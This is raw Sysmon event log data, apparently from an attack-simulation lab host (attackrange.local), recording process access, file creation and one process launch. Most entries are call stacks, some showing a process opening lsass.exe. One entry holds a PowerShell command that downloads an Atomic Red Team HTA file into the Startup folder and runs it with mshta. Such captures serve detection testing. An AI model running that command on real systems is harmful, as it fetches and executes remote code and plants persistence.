15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789605Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789604Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789603Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789602Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789601Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789600Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FFC4AC9FC23) 10341000x8000000000000000789599Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-31A3-6010-A3A2-00000000A301}64165800C:\Windows\system32\conhost.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789598Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789597Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789596Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789595Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-17DF-600B-9401-00000000A301}50844476C:\Windows\system32\csrss.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789594Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789593Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-31A3-6010-A2A2-00000000A301}7260604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+3e0011(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+3e0011(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+3e0011(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\f170745c571d606b4c8c92644c7c13d7\Microsoft.PowerShell.Commands.Management.ni.dll+3e0011(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22070eb8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22070d2c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220f3558|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22069914|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22b22b07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2203210c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+220905db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073c40|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22073ad1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+22065a56|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+2209ebe6 154100x8000000000000000789592Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.314{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$var =Invoke-WebRequest \""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta\"" $var.content|out-file \""$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta\"" mshta \""$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta\""} C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x8000000000000000789591Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.298{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-01-26 15:16:36.298 11241100x8000000000000000789590Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.298{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-01-26 15:16:36.298 10341000x8000000000000000789589Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.251{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789588Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.251{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789587Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789586Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789585Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789584Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789583Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789582Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789581Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789580Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789579Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.236{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789578Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 